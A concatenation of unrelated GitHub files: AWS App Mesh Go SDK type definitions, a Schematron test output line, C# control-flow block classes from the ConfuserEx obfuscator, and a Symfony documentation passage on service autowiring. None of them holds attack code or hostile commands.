// The AWS IAM account ID of the service mesh owner. If the account ID is not your
// own, then it's the ID of the account that shared the mesh with your account. For
// more information about mesh sharing, see Working with shared meshes
// (https://docs.aws.amazon.com/app-mesh/latest/userguide/sharing.html).
MeshOwner *string
// The AWS IAM account ID of the resource owner. If the account ID is not your own,
// then it's the ID of the mesh owner or of another account that the mesh is shared
// with. For more information about mesh sharing, see Working with shared meshes
// (https://docs.aws.amazon.com/app-mesh/latest/userguide/sharing.html).
ResourceOwner *string
// The full Amazon Resource Name (ARN) of the service mesh.
Arn *string
// The version of the resource. Resources are created at version 1, and this
// version is incremented each time that they're updated.
Version *int64
// The Unix epoch timestamp in seconds for when the resource was created.
CreatedAt *time.Time
// The Unix epoch timestamp in seconds for when the resource was last updated.
LastUpdatedAt *time.Time
}
// An object that represents the specification of a service mesh.
type MeshSpec struct {
// The egress filter rules for the service mesh.
EgressFilter *EgressFilter
}
// An object that represents the status of a service mesh.
type MeshStatus struct {
// The current mesh status.
Status MeshStatusCode
}
// An object that represents a port mapping.
type PortMapping struct {
// The port used for the port mapping.
Port *int32
// The protocol used for the port mapping. Specify one protocol.
Protocol PortProtocol
}
// An object that represents metadata for a resource.
type ResourceMetadata struct {
// The full Amazon Resource Name (ARN) for the resource.
Arn *string
// The version of the resource. Resources are created at version 1, and this
// version is incremented each time that they're updated.
Version *int64
// The unique identifier for the resource.
Uid *string
// The Unix epoch timestamp in seconds for when the resource was created.
CreatedAt *time.Time
// The Unix epoch timestamp in seconds for when the resource was last updated.
LastUpdatedAt *time.Time
// The AWS IAM account ID of the service mesh owner. If the account ID is not your
// own, then it's the ID of the account that shared the mesh with your account. For
// more information about mesh sharing, see Working with shared meshes
// (https://docs.aws.amazon.com/app-mesh/latest/userguide/sharing.html).
MeshOwner *string
// The AWS IAM account ID of the resource owner. If the account ID is not your own,
// then it's the ID of the mesh owner or of another account that the mesh is shared
// with. For more information about mesh sharing, see Working with shared meshes
// (https://docs.aws.amazon.com/app-mesh/latest/userguide/sharing.html).
ResourceOwner *string
}
// An object that represents a route returned by a describe operation.
type RouteData struct {
// The name of the service mesh that the route resides in.
MeshName *string
// The virtual router that the route is associated with.
VirtualRouterName *string
// The name of the route.
RouteName *string
// The specifications of the route.
Spec *RouteSpec
// The associated metadata for the route.
Metadata *ResourceMetadata
// The status of the route.
Status *RouteStatus
}
// An object that represents a route returned by a list operation.
type RouteRef struct {
// The name of the service mesh that the route resides in.
MeshName *string
// The virtual router that the route is associated with.
VirtualRouterName *string
// The name of the route.
RouteName *string
// The AWS IAM account ID of the service mesh owner. If the account ID is not your
// own, then it's the ID of the account that shared the mesh with your account. For
// more information about mesh sharing, see Working with shared meshes
// (https://docs.aws.amazon.com/app-mesh/latest/userguide/sharing.html).
MeshOwner *string
// The AWS IAM account ID of the resource owner. If the account ID is not your own,
// then it's the ID of the mesh owner or of another account that the mesh is shared
// with. For more information about mesh sharing, see Working with shared meshes
// (https://docs.aws.amazon.com/app-mesh/latest/userguide/sharing.html).
ResourceOwner *string
// The full Amazon Resource Name (ARN) for the route.
Arn *string
// The version of the resource. Resources are created at version 1, and this
// version is incremented each time that they're updated.
Version *int64
// The Unix epoch timestamp in seconds for when the resource was created.
CreatedAt *time.Time
// The Unix epoch timestamp in seconds for when the resource was last updated.
LastUpdatedAt *time.Time
}
// An object that represents a route specification. Specify one route type.
type RouteSpec struct {
// The priority for the route. Routes are matched based on the specified value,
// where 0 is the highest priority.
Priority *int32
// An object that represents the specification of an HTTP route.
HttpRoute *HttpRoute
// An object that represents the specification of a TCP route.
TcpRoute *TcpRoute
// An object that represents the specification of an HTTP/2 route.
Http2Route *HttpRoute
// An object that represents the specification of a gRPC route.
GrpcRoute *GrpcRoute
}
// An object that represents the current status of a route.
type RouteStatus struct {
// The current status for the route.
Status RouteStatusCode
}
// An object that represents the service discovery information for a virtual node.
type ServiceDiscovery interface {
isServiceDiscovery()
}
// Specifies the DNS information for the virtual node.
type ServiceDiscoveryMemberDns struct {
Value *DnsServiceDiscovery
}
func (*ServiceDiscoveryMemberDns) isServiceDiscovery() {}
// Specifies any AWS Cloud Map information for the virtual node.
type ServiceDiscoveryMemberAwsCloudMap struct {
Value *AwsCloudMapServiceDiscovery
}
func (*ServiceDiscoveryMemberAwsCloudMap) isServiceDiscovery() {}
// Optional metadata that you apply to a resource to assist with categorization and
// organization. Each tag consists of a key and an optional value, both of which
// you define. Tag keys can have a maximum character length of 128 characters, and
// tag values can have a maximum length of 256 characters.
type TagRef struct {
// One part of a key-value pair that make up a tag. A key is a general label that
// acts like a category for more specific tag values.
Key *string
// The optional part of a key-value pair that make up a tag. A value acts as a
// descriptor within a tag category (key).
Value *string
}
// An object that represents a TCP route type.
type TcpRoute struct {
// The action to take if a match is determined.
Action *TcpRouteAction
// An object that represents types of timeouts.
Timeout *TcpTimeout
}
// An object that represents the action to take if a match is determined.
type TcpRouteAction struct {
// An object that represents the targets that traffic is routed to when a request
// matches the route.
WeightedTargets []*WeightedTarget
}
// An object that represents types of timeouts.
type TcpTimeout struct {
// An object that represents a duration of time.
Idle *Duration
}
// An object that represents a Transport Layer Security (TLS) validation context.
type TlsValidationContext struct {
// A reference to an object that represents a TLS validation context trust.
Trust TlsValidationContextTrust
}
// An object that represents a TLS validation context trust for an AWS Certicate
// Manager (ACM) certificate.
type TlsValidationContextAcmTrust struct {
// One or more ACM Amazon Resource Name (ARN)s.
CertificateAuthorityArns []*string
}
// An object that represents a Transport Layer Security (TLS) validation context
// trust for a local file.
type TlsValidationContextFileTrust struct {
// The certificate trust chain for a certificate stored on the file system of the
// virtual node that the proxy is running on.
CertificateChain *string
}
// An object that represents a Transport Layer Security (TLS) validation context
// trust.
type TlsValidationContextTrust interface {
isTlsValidationContextTrust()
}
// A reference to an object that represents a TLS validation context trust for an
// AWS Certicate Manager (ACM) certificate.
type TlsValidationContextTrustMemberAcm struct {
Value *TlsValidationContextAcmTrust
}
func (*TlsValidationContextTrustMemberAcm) isTlsValidationContextTrust() {}
// An object that represents a TLS validation context trust for a local file.
type TlsValidationContextTrustMemberFile struct {
Value *TlsValidationContextFileTrust
}
func (*TlsValidationContextTrustMemberFile) isTlsValidationContextTrust() {}
// The access log configuration for a virtual gateway.
type VirtualGatewayAccessLog interface {
isVirtualGatewayAccessLog()
}
// The file object to send virtual gateway access logs to.
type VirtualGatewayAccessLogMemberFile struct {
Value *VirtualGatewayFileAccessLog
}
func (*VirtualGatewayAccessLogMemberFile) isVirtualGatewayAccessLog() {}
// An object that represents the default properties for a backend.
type VirtualGatewayBackendDefaults struct {
// A reference to an object that represents a client policy.
ClientPolicy *VirtualGatewayClientPolicy
}
// An object that represents a client policy.
type VirtualGatewayClientPolicy struct {
// A reference to an object that represents a Transport Layer Security (TLS) client
// policy.
Tls *VirtualGatewayClientPolicyTls
}
// An object that represents a Transport Layer Security (TLS) client policy.
type VirtualGatewayClientPolicyTls struct {
// Whether the policy is enforced. The default is True, if a value isn't specified.
Enforce *bool
// One or more ports that the policy is enforced for.
Ports []*int32
// A reference to an object that represents a TLS validation context.
Validation *VirtualGatewayTlsValidationContext
}
// An object that represents a virtual gateway returned by a describe operation.
type VirtualGatewayData struct {
// The name of the service mesh that the virtual gateway resides in.
MeshName *string
// The name of the virtual gateway.
VirtualGatewayName *string
// The specifications of the virtual gateway.
Spec *VirtualGatewaySpec
// An object that represents metadata for a resource.
Metadata *ResourceMetadata
// The current status of the virtual gateway.
Status *VirtualGatewayStatus
}
// An object that represents an access log file.
type VirtualGatewayFileAccessLog struct {
// The file path to write access logs to. You can use /dev/stdout to send access
// logs to standard out and configure your Envoy container to use a log driver,
// such as awslogs, to export the access logs to a log storage service such as
// Amazon CloudWatch Logs. You can also specify a path in the Envoy container's
// file system to write the files to disk.
Path *string
}
// An object that represents the health check policy for a virtual gateway's
// listener.
type VirtualGatewayHealthCheckPolicy struct {
// The amount of time to wait when receiving a response from the health check, in
// milliseconds.
TimeoutMillis *int64
// The time period in milliseconds between each health check execution.
IntervalMillis *int64
// The protocol for the health check request. If you specify grpc, then your
// service must conform to the GRPC Health Checking Protocol
// (https://github.com/grpc/grpc/blob/master/doc/health-checking.md).
Protocol VirtualGatewayPortProtocol
// The destination port for the health check request. This port must match the port
// defined in the PortMapping () for the listener.
Port *int32
// The destination path for the health check request. This value is only used if
// the specified protocol is HTTP or HTTP/2. For any other protocol, this value is
// ignored.
Path *string
// The number of consecutive successful health checks that must occur before
// declaring the listener healthy.
HealthyThreshold *int32
// The number of consecutive failed health checks that must occur before declaring
// a virtual gateway unhealthy.
UnhealthyThreshold *int32
}
// An object that represents a listener for a virtual gateway.
type VirtualGatewayListener struct {
// The health check information for the listener.
HealthCheck *VirtualGatewayHealthCheckPolicy
// The port mapping information for the listener.
PortMapping *VirtualGatewayPortMapping
// A reference to an object that represents the Transport Layer Security (TLS)
// properties for the listener.
Tls *VirtualGatewayListenerTls
}
// An object that represents the Transport Layer Security (TLS) properties for a
// listener.
type VirtualGatewayListenerTls struct {
// Specify one of the following modes.
//
// * STRICT – Listener only accepts
// connections with TLS enabled.
//
// * PERMISSIVE – Listener accepts connections
// with or without TLS enabled.
//
// * DISABLED – Listener only accepts connections
// without TLS.
Mode VirtualGatewayListenerTlsMode
// An object that represents a Transport Layer Security (TLS) certificate.
Certificate VirtualGatewayListenerTlsCertificate
}
// An object that represents an AWS Certicate Manager (ACM) certificate.
type VirtualGatewayListenerTlsAcmCertificate struct {
// The Amazon Resource Name (ARN) for the certificate. The certificate must meet
// specific requirements and you must have proxy authorization enabled. For more
// information, see Transport Layer Security (TLS)
// (https://docs.aws.amazon.com/app-mesh/latest/userguide/tls.html#virtual-node-tls-prerequisites).
CertificateArn *string
}
// An object that represents a listener's Transport Layer Security (TLS)
// certificate.
type VirtualGatewayListenerTlsCertificate interface {
isVirtualGatewayListenerTlsCertificate()
}
// A reference to an object that represents an AWS Certicate Manager (ACM)
// certificate.
type VirtualGatewayListenerTlsCertificateMemberAcm struct {
Value *VirtualGatewayListenerTlsAcmCertificate
}
func (*VirtualGatewayListenerTlsCertificateMemberAcm) isVirtualGatewayListenerTlsCertificate() {}
// A reference to an object that represents a local file certificate.
type VirtualGatewayListenerTlsCertificateMemberFile struct {
Value *VirtualGatewayListenerTlsFileCertificate
}
func (*VirtualGatewayListenerTlsCertificateMemberFile) isVirtualGatewayListenerTlsCertificate() {}
// An object that represents a local file certificate. The certificate must meet
// specific requirements and you must have proxy authorization enabled. For more
// information, see Transport Layer Security (TLS)
// (https://docs.aws.amazon.com/app-mesh/latest/userguide/tls.html#virtual-node-tls-prerequisites).
type VirtualGatewayListenerTlsFileCertificate struct {
// The certificate chain for the certificate.
CertificateChain *string
// The private key for a certificate stored on the file system of the mesh endpoint
// that the proxy is running on.
PrivateKey *string
}
// An object that represents logging information.
type VirtualGatewayLogging struct {
// The access log configuration.
AccessLog VirtualGatewayAccessLog
}
// An object that represents a port mapping.
type VirtualGatewayPortMapping struct {
// The port used for the port mapping. Specify one protocol.
Port *int32
// The protocol used for the port mapping.
Protocol VirtualGatewayPortProtocol
}
// An object that represents a virtual gateway returned by a list operation.
type VirtualGatewayRef struct {
// The name of the service mesh that the resource resides in.
MeshName *string
// The name of the resource.
VirtualGatewayName *string
// The AWS IAM account ID of the service mesh owner. If the account ID is not your
// own, then it's the ID of the account that shared the mesh with your account. For
// more information about mesh sharing, see Working with shared meshes
// (https://docs.aws.amazon.com/app-mesh/latest/userguide/sharing.html).
MeshOwner *string
// The AWS IAM account ID of the resource owner. If the account ID is not your own,
// then it's the ID of the mesh owner or of another account that the mesh is shared
// with. For more information about mesh sharing, see Working with shared meshes
// (https://docs.aws.amazon.com/app-mesh/latest/userguide/sharing.html).
ResourceOwner *string
// The full Amazon Resource Name (ARN) for the resource.
Arn *string
// The version of the resource. Resources are created at version 1, and this
// version is incremented each time that they're updated.
Version *int64
// The Unix epoch timestamp in seconds for when the resource was created.
CreatedAt *time.Time
// The Unix epoch timestamp in seconds for when the resource was last updated.
LastUpdatedAt *time.Time
}
// An object that represents the specification of a service mesh resource.
type VirtualGatewaySpec struct {
// A reference to an object that represents the defaults for backends.
BackendDefaults *VirtualGatewayBackendDefaults
// The listeners that the mesh endpoint is expected to receive inbound traffic
// from. You can specify one listener.
Listeners []*VirtualGatewayListener
// An object that represents logging information.
Logging *VirtualGatewayLogging
}
// An object that represents the status of the mesh resource.
type VirtualGatewayStatus struct {
// The current status.
Status VirtualGatewayStatusCode
}
// An object that represents a Transport Layer Security (TLS) validation context.
type VirtualGatewayTlsValidationContext struct {
// A reference to an object that represents a TLS validation context trust.
Trust VirtualGatewayTlsValidationContextTrust
}
// An object that represents a TLS validation context trust for an AWS Certicate
// Manager (ACM) certificate.
type VirtualGatewayTlsValidationContextAcmTrust struct {
// One or more ACM Amazon Resource Name (ARN)s.
CertificateAuthorityArns []*string
}
// An object that represents a Transport Layer Security (TLS) validation context
// trust for a local file.
type VirtualGatewayTlsValidationContextFileTrust struct {
// The certificate trust chain for a certificate stored on the file system of the
// virtual node that the proxy is running on.
CertificateChain *string
}
// An object that represents a Transport Layer Security (TLS) validation context
// trust.
type VirtualGatewayTlsValidationContextTrust interface {
isVirtualGatewayTlsValidationContextTrust()
}
// A reference to an object that represents a TLS validation context trust for an
// AWS Certicate Manager (ACM) certificate.
type VirtualGatewayTlsValidationContextTrustMemberAcm struct {
Value *VirtualGatewayTlsValidationContextAcmTrust
}
func (*VirtualGatewayTlsValidationContextTrustMemberAcm) isVirtualGatewayTlsValidationContextTrust() {
}
// An object that represents a TLS validation context trust for a local file.
type VirtualGatewayTlsValidationContextTrustMemberFile struct {
Value *VirtualGatewayTlsValidationContextFileTrust
}
func (*VirtualGatewayTlsValidationContextTrustMemberFile) isVirtualGatewayTlsValidationContextTrust() {
}
// An object that represents a virtual node returned by a describe operation.
type VirtualNodeData struct {
// The name of the service mesh that the virtual node resides in.
MeshName *string
// The name of the virtual node.
VirtualNodeName *string
// The specifications of the virtual node.
Spec *VirtualNodeSpec
// The associated metadata for the virtual node.
Metadata *ResourceMetadata
// The current status for the virtual node.
Status *VirtualNodeStatus
}
// An object that represents a virtual node returned by a list operation.
type VirtualNodeRef struct {
// The name of the service mesh that the virtual node resides in.
MeshName *string
// The name of the virtual node.
VirtualNodeName *string
// The AWS IAM account ID of the service mesh owner. If the account ID is not your
// own, then it's the ID of the account that shared the mesh with your account. For
// more information about mesh sharing, see Working with shared meshes
// (https://docs.aws.amazon.com/app-mesh/latest/userguide/sharing.html).
MeshOwner *string
// The AWS IAM account ID of the resource owner. If the account ID is not your own,
// then it's the ID of the mesh owner or of another account that the mesh is shared
// with. For more information about mesh sharing, see Working with shared meshes
// (https://docs.aws.amazon.com/app-mesh/latest/userguide/sharing.html).
ResourceOwner *string
// The full Amazon Resource Name (ARN) for the virtual node.
Arn *string
// The version of the resource. Resources are created at version 1, and this
// version is incremented each time that they're updated.
Version *int64
// The Unix epoch timestamp in seconds for when the resource was created.
CreatedAt *time.Time
// The Unix epoch timestamp in seconds for when the resource was last updated.
LastUpdatedAt *time.Time
}
// An object that represents a virtual node service provider.
type VirtualNodeServiceProvider struct {
// The name of the virtual node that is acting as a service provider.
VirtualNodeName *string
}
// An object that represents the specification of a virtual node.
type VirtualNodeSpec struct {
// The service discovery information for the virtual node. If your virtual node
// does not expect ingress traffic, you can omit this parameter. If you specify a
// listener, then you must specify service discovery information.
ServiceDiscovery ServiceDiscovery
// The listener that the virtual node is expected to receive inbound traffic from.
// You can specify one listener.
Listeners []*Listener
// The backends that the virtual node is expected to send outbound traffic to.
Backends []Backend
// A reference to an object that represents the defaults for backends.
BackendDefaults *BackendDefaults
// The inbound and outbound access logging information for the virtual node.
Logging *Logging
}
// An object that represents the current status of the virtual node.
type VirtualNodeStatus struct {
// The current status of the virtual node.
Status VirtualNodeStatusCode
}
// An object that represents a virtual router returned by a describe operation.
type VirtualRouterData struct {
// The name of the service mesh that the virtual router resides in.
MeshName *string
// The name of the virtual router.
VirtualRouterName *string
// The specifications of the virtual router.
Spec *VirtualRouterSpec
// The associated metadata for the virtual router.
Metadata *ResourceMetadata
// The current status of the virtual router.
Status *VirtualRouterStatus
}
// An object that represents a virtual router listener.
type VirtualRouterListener struct {
// An object that represents a port mapping.
PortMapping *PortMapping
}
// An object that represents a virtual router returned by a list operation.
type VirtualRouterRef struct {
// The name of the service mesh that the virtual router resides in.
MeshName *string
// The name of the virtual router.
VirtualRouterName *string
// The AWS IAM account ID of the service mesh owner. If the account ID is not your
// own, then it's the ID of the account that shared the mesh with your account. For
// more information about mesh sharing, see Working with shared meshes
// (https://docs.aws.amazon.com/app-mesh/latest/userguide/sharing.html).
MeshOwner *string
// The AWS IAM account ID of the resource owner. If the account ID is not your own,
// then it's the ID of the mesh owner or of another account that the mesh is shared
// with. For more information about mesh sharing, see Working with shared meshes
// (https://docs.aws.amazon.com/app-mesh/latest/userguide/sharing.html).
ResourceOwner *string
// The full Amazon Resource Name (ARN) for the virtual router.
Arn *string
// The version of the resource. Resources are created at version 1, and this
// version is incremented each time that they're updated.
Version *int64
// The Unix epoch timestamp in seconds for when the resource was created.
CreatedAt *time.Time
// The Unix epoch timestamp in seconds for when the resource was last updated.
LastUpdatedAt *time.Time
}
// An object that represents a virtual node service provider.
type VirtualRouterServiceProvider struct {
// The name of the virtual router that is acting as a service provider.
VirtualRouterName *string
}
// An object that represents the specification of a virtual router.
type VirtualRouterSpec struct {
// The listeners that the virtual router is expected to receive inbound traffic
// from. You can specify one listener.
Listeners []*VirtualRouterListener
}
// An object that represents the status of a virtual router.
type VirtualRouterStatus struct {
// The current status of the virtual router.
Status VirtualRouterStatusCode
}
// An object that represents a virtual service backend for a virtual node.
type VirtualServiceBackend struct {
// The name of the virtual service that is acting as a virtual node backend.
VirtualServiceName *string
// A reference to an object that represents the client policy for a backend.
ClientPolicy *ClientPolicy
}
// An object that represents a virtual service returned by a describe operation.
type VirtualServiceData struct {
// The name of the service mesh that the virtual service resides in.
MeshName *string
// The name of the virtual service.
VirtualServiceName *string
// The specifications of the virtual service.
Spec *VirtualServiceSpec
// An object that represents metadata for a resource.
Metadata *ResourceMetadata
// The current status of the virtual service.
Status *VirtualServiceStatus
}
// An object that represents the provider for a virtual service.
type VirtualServiceProvider interface {
isVirtualServiceProvider()
}
// The virtual node associated with a virtual service.
type VirtualServiceProviderMemberVirtualNode struct {
Value *VirtualNodeServiceProvider
}
func (*VirtualServiceProviderMemberVirtualNode) isVirtualServiceProvider() {}
// The virtual router associated with a virtual service.
type VirtualServiceProviderMemberVirtualRouter struct {
Value *VirtualRouterServiceProvider
}
func (*VirtualServiceProviderMemberVirtualRouter) isVirtualServiceProvider() {}
// An object that represents a virtual service returned by a list operation.
type VirtualServiceRef struct {
// The name of the service mesh that the virtual service resides in.
MeshName *string
// The name of the virtual service.
VirtualServiceName *string
// The AWS IAM account ID of the service mesh owner. If the account ID is not your
// own, then it's the ID of the account that shared the mesh with your account. For
// more information about mesh sharing, see Working with shared meshes
// (https://docs.aws.amazon.com/app-mesh/latest/userguide/sharing.html).
MeshOwner *string
// The AWS IAM account ID of the resource owner. If the account ID is not your own,
// then it's the ID of the mesh owner or of another account that the mesh is shared
// with. For more information about mesh sharing, see Working with shared meshes
// (https://docs.aws.amazon.com/app-mesh/latest/userguide/sharing.html).
ResourceOwner *string
// The full Amazon Resource Name (ARN) for the virtual service.
Arn *string
// The version of the resource. Resources are created at version 1, and this
// version is incremented each time that they're updated.
Version *int64
// The Unix epoch timestamp in seconds for when the resource was created.
CreatedAt *time.Time
// The Unix epoch timestamp in seconds for when the resource was last updated.
LastUpdatedAt *time.Time
}
// An object that represents the specification of a virtual service.
type VirtualServiceSpec struct {
// The App Mesh object that is acting as the provider for a virtual service. You
// can specify a single virtual node or virtual router.
Provider VirtualServiceProvider
}
// An object that represents the status of a virtual service.
type VirtualServiceStatus struct {
// The current status of the virtual service.
Status VirtualServiceStatusCode
}
// An object that represents a target and its relative weight. Traffic is
// distributed across targets according to their relative weight. For example, a
// weighted target with a relative weight of 50 receives five times as much traffic
// as one with a relative weight of 10. The total weight for all targets combined
// must be less than or equal to 100.
type WeightedTarget struct {
// The virtual node to associate with the weighted target.
VirtualNode *string
// The relative weight of the weighted target.
Weight *int32
}
// UnknownUnionMember is returned when a union member is returned over the wire,
// but has an unknown tag.
type UnknownUnionMember struct {
Tag string
Value []byte
}
func (*UnknownUnionMember) isAccessLog() {}
func (*UnknownUnionMember) isBackend() {}
func (*UnknownUnionMember) isGrpcRouteMetadataMatchMethod() {}
func (*UnknownUnionMember) isHeaderMatchMethod() {}
func (*UnknownUnionMember) isListenerTimeout() {}
func (*UnknownUnionMember) isListenerTlsCertificate() {}
func (*UnknownUnionMember) isServiceDiscovery() {}
func (*UnknownUnionMember) isTlsValidationContextTrust() {}
func (*UnknownUnionMember) isVirtualGatewayAccessLog() {}
func (*UnknownUnionMember) isVirtualGatewayListenerTlsCertificate() {}
func (*UnknownUnionMember) isVirtualGatewayTlsValidationContextTrust() {}
func (*UnknownUnionMember) isVirtualServiceProvider() {}
| {
"pile_set_name": "Github"
} |
Pattern: Number of characters in an abbreviation
/AAA/BBB line 2: There is too much letters in the abbreviation
./test/schematron/zvon12_2.xml fails to validate
| {
"pile_set_name": "Github"
} |
#region
using System.Collections.Generic;
using System.Linq;
using System.Text;
using dnlib.DotNet.Emit;
#endregion
namespace Confuser.Protections.ControlFlow
{
internal abstract class BlockBase
{
public BlockBase(BlockType type)
{
Type = type;
}
public ScopeBlock Parent
{
get;
private set;
}
public BlockType Type
{
get;
}
public abstract void ToBody(CilBody body);
}
internal enum BlockType
{
Normal,
Try,
Handler,
Finally,
Filter,
Fault
}
internal class ScopeBlock : BlockBase
{
public ScopeBlock(BlockType type, ExceptionHandler handler)
: base(type)
{
Handler = handler;
Children = new List<BlockBase>();
}
public ExceptionHandler Handler
{
get;
}
public List<BlockBase> Children
{
get;
set;
}
public override string ToString()
{
var ret = new StringBuilder();
if(Type == BlockType.Try)
ret.Append("try ");
else if(Type == BlockType.Handler)
ret.Append("handler ");
else if(Type == BlockType.Finally)
ret.Append("finally ");
else if(Type == BlockType.Fault)
ret.Append("fault ");
ret.AppendLine("{");
foreach(var child in Children)
ret.Append(child);
ret.AppendLine("}");
return ret.ToString();
}
public Instruction GetFirstInstr()
{
var firstBlock = Children.First();
if(firstBlock is ScopeBlock)
return ((ScopeBlock) firstBlock).GetFirstInstr();
return ((InstrBlock) firstBlock).Instructions.First();
}
public Instruction GetLastInstr()
{
var firstBlock = Children.Last();
if(firstBlock is ScopeBlock)
return ((ScopeBlock) firstBlock).GetLastInstr();
return ((InstrBlock) firstBlock).Instructions.Last();
}
public override void ToBody(CilBody body)
{
if(Type != BlockType.Normal)
if(Type == BlockType.Try)
{
Handler.TryStart = GetFirstInstr();
Handler.TryEnd = GetLastInstr();
}
else if(Type == BlockType.Filter)
{
Handler.FilterStart = GetFirstInstr();
}
else
{
Handler.HandlerStart = GetFirstInstr();
Handler.HandlerEnd = GetLastInstr();
}
foreach(var block in Children)
block.ToBody(body);
}
}
internal class InstrBlock : BlockBase
{
public InstrBlock()
: base(BlockType.Normal)
{
Instructions = new List<Instruction>();
}
public List<Instruction> Instructions
{
get;
set;
}
public override string ToString()
{
var ret = new StringBuilder();
foreach(var instr in Instructions)
ret.AppendLine(instr.ToString());
return ret.ToString();
}
public override void ToBody(CilBody body)
{
foreach(var instr in Instructions)
body.Instructions.Add(instr);
}
}
} | {
"pile_set_name": "Github"
} |
.. index::
single: DependencyInjection; Autowiring
Defining Services Dependencies Automatically (Autowiring)
=========================================================
Autowiring allows you to manage services in the container with minimal
configuration. It reads the type-hints on your constructor (or other methods)
and automatically passes the correct services to each method. Symfony's
autowiring is designed to be predictable: if it is not absolutely clear which
dependency should be passed, you'll see an actionable exception.
.. tip::
Thanks to Symfony's compiled container, there is no runtime overhead for using
autowiring.
An Autowiring Example
---------------------
Imagine you're building an API to publish statuses on a Twitter feed, obfuscated
with `ROT13`_, a fun encoder that shifts all characters 13 letters forward in
the alphabet.
Start by creating a ROT13 transformer class::
namespace App\Util;
class Rot13Transformer
{
public function transform($value)
{
return str_rot13($value);
}
}
And now a Twitter client using this transformer::
namespace App\Service;
use App\Util\Rot13Transformer;
class TwitterClient
{
private $transformer;
public function __construct(Rot13Transformer $transformer)
{
$this->transformer = $transformer;
}
public function tweet($user, $key, $status)
{
$transformedStatus = $this->transformer->transform($status);
// ... connect to Twitter and send the encoded status
}
}
If you're using the :ref:`default services.yaml configuration <service-container-services-load-example>`,
**both classes are automatically registered as services and configured to be autowired**.
This means you can use them immediately without *any* configuration.
However, to understand autowiring better, the following examples explicitly configure
both services:
.. configuration-block::
.. code-block:: yaml
# config/services.yaml
services:
_defaults:
autowire: true
autoconfigure: true
# ...
App\Service\TwitterClient:
# redundant thanks to _defaults, but value is overridable on each service
autowire: true
App\Util\Rot13Transformer:
autowire: true
.. code-block:: xml
<!-- config/services.xml -->
<?xml version="1.0" encoding="UTF-8" ?>
<container xmlns="http://symfony.com/schema/dic/services"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://symfony.com/schema/dic/services https://symfony.com/schema/dic/services/services-1.0.xsd">
<services>
<defaults autowire="true" autoconfigure="true"/>
<!-- ... -->
<!-- autowire is redundant thanks to defaults, but value is overridable on each service -->
<service id="App\Service\TwitterClient" autowire="true"/>
<service id="App\Util\Rot13Transformer" autowire="true"/>
</services>
</container>
.. code-block:: php
// config/services.php
return function(ContainerConfigurator $configurator) {
$services = $configurator->services()
->defaults()
->autowire()
->autoconfigure()
;
$services->set(TwitterClient::class)
// redundant thanks to defaults, but value is overridable on each service
->autowire();
$services->set(Rot13Transformer::class)
->autowire();
};
Now, you can use the ``TwitterClient`` service immediately in a controller::
namespace App\Controller;
use App\Service\TwitterClient;
use Symfony\Bundle\FrameworkBundle\Controller\AbstractController;
use Symfony\Component\Routing\Annotation\Route;
class DefaultController extends AbstractController
{
/**
* @Route("/tweet", methods={"POST"})
*/
public function tweet(TwitterClient $twitterClient)
{
// fetch $user, $key, $status from the POST'ed data
$twitterClient->tweet($user, $key, $status);
// ...
}
}
This works automatically! The container knows to pass the ``Rot13Transformer`` service
as the first argument when creating the ``TwitterClient`` service.
.. _autowiring-logic-explained:
Autowiring Logic Explained
--------------------------
Autowiring works by reading the ``Rot13Transformer`` *type-hint* in ``TwitterClient``::
// ...
use App\Util\Rot13Transformer;
class TwitterClient
{
// ...
public function __construct(Rot13Transformer $transformer)
{
$this->transformer = $transformer;
}
}
The autowiring system **looks for a service whose id exactly matches the type-hint**:
so ``App\Util\Rot13Transformer``. In this case, that exists! When you configured
the ``Rot13Transformer`` service, you used its fully-qualified class name as its
id. Autowiring isn't magic: it looks for a service whose id matches the type-hint.
If you :ref:`load services automatically <service-container-services-load-example>`,
each service's id is its class name.
If there is *not* a service whose id exactly matches the type, a clear exception
will be thrown.
Autowiring is a great way to automate configuration, and Symfony tries to be as
*predictable* and clear as possible.
.. _service-autowiring-alias:
Using Aliases to Enable Autowiring
----------------------------------
The main way to configure autowiring is to create a service whose id exactly matches
its class. In the previous example, the service's id is ``App\Util\Rot13Transformer``,
which allows us to autowire this type automatically.
This can also be accomplished using an :ref:`alias <services-alias>`. Suppose that
for some reason, the id of the service was instead ``app.rot13.transformer``. In
this case, any arguments type-hinted with the class name (``App\Util\Rot13Transformer``)
can no longer be autowired.
No problem! To fix this, you can *create* a service whose id matches the class by
adding a service alias:
.. configuration-block::
.. code-block:: yaml
# config/services.yaml
services:
# ...
# the id is not a class, so it won't be used for autowiring
app.rot13.transformer:
class: App\Util\Rot13Transformer
# ...
# but this fixes it!
# the ``app.rot13.transformer`` service will be injected when
# an ``App\Util\Rot13Transformer`` type-hint is detected
App\Util\Rot13Transformer: '@app.rot13.transformer'
.. code-block:: xml
<!-- config/services.xml -->
<?xml version="1.0" encoding="UTF-8" ?>
<container xmlns="http://symfony.com/schema/dic/services"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://symfony.com/schema/dic/services https://symfony.com/schema/dic/services/services-1.0.xsd">
<services>
<!-- ... -->
<service id="app.rot13.transformer" class="App\Util\Rot13Transformer" autowire="true"/>
<service id="App\Util\Rot13Transformer" alias="app.rot13.transformer"/>
</services>
</container>
.. code-block:: php
// config/services.php
namespace Symfony\Component\DependencyInjection\Loader\Configurator;
use App\Util\Rot13Transformer;
return function(ContainerConfigurator $configurator) {
// ...
// the id is not a class, so it won't be used for autowiring
$services->set('app.rot13.transformer', Rot13Transformer::class)
->autowire();
// but this fixes it!
// the ``app.rot13.transformer`` service will be injected when
// an ``App\Util\Rot13Transformer`` type-hint is detected
$services->alias(Rot13Transformer::class, 'app.rot13.transformer');
};
This creates a service "alias", whose id is ``App\Util\Rot13Transformer``.
Thanks to this, autowiring sees this and uses it whenever the ``Rot13Transformer``
class is type-hinted.
.. tip::
Aliases are used by the core bundles to allow services to be autowired. For
example, MonologBundle creates a service whose id is ``logger``. But it also
adds an alias: ``Psr\Log\LoggerInterface`` that points to the ``logger`` service.
This is why arguments type-hinted with ``Psr\Log\LoggerInterface`` can be autowired.
.. _autowiring-interface-alias:
Working with Interfaces
-----------------------
You might also find yourself type-hinting abstractions (e.g. interfaces) instead
of concrete classes as it replaces your dependencies with other objects.
To follow this best practice, suppose you decide to create a ``TransformerInterface``::
namespace App\Util;
interface TransformerInterface
{
public function transform($value);
}
Then, you update ``Rot13Transformer`` to implement it::
// ...
class Rot13Transformer implements TransformerInterface
{
// ...
}
Now that you have an interface, you should use this as your type-hint::
class TwitterClient
{
public function __construct(TransformerInterface $transformer)
{
